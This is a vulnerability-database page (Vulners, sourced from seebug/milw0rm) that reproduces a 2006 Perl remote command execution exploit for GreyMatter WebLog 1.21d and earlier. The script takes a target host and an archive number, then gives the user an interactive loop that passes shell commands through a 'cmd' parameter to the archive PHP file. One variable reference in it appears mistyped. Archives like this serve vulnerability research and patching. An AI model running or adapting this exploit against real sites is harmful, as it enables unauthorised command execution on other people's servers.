Lucene search
K

GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)

🗓️ 28 Mar 2006 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

GreyMatter WebLog <= 1.21d Remote Command Execution Exploi

Code

                                                #!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# Special Thanx : Vampire , s3rv3r_hack3r
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    &lt;\  ___/|  | \//    /  #
# \___|_  /(____  )\___  &gt;__|_ \\___  &gt;__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
# Name    : Greymatter                               #
# Site    : http://www.noahgrey.com/greysoft/        #
######################################################
# example:
# target : www.yesite.com/Greymatter/
# archive number : 00000141
use LWP::Simple;


print &quot;-------------------------------------------\n&quot;;
print &quot;=                 Greymatter              =\n&quot;;
print &quot;=       By Hessam-x  - www.hackerz.ir     =\n&quot;;
print &quot;=   Vampire      - www.deltahacking.com   =\n&quot;; 
print &quot;-------------------------------------------\n\n&quot;;


      print &quot;Target &gt;http://&quot;;
      chomp($targ = &lt;STDIN&gt;);
      print &quot;archive number &gt;&quot;;
      chomp($arnum= &lt;STDIN&gt;);
   
   $con=get(&quot;http://&quot;.$targ) || die &quot;[-]Cannot connect to Host&quot;; 
while ()  
{  
     print &quot;Hessam-x@Greymatter \$&quot;;
     chomp($comd=&lt;STDIN&gt;);
     $commd=get(&quot;http://&quot;.$targ.&quot;archives/&quot;.$arnum.&quot;.php?cmd=&quot;.comd)
}

# milw0rm.com [2006-03-28]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation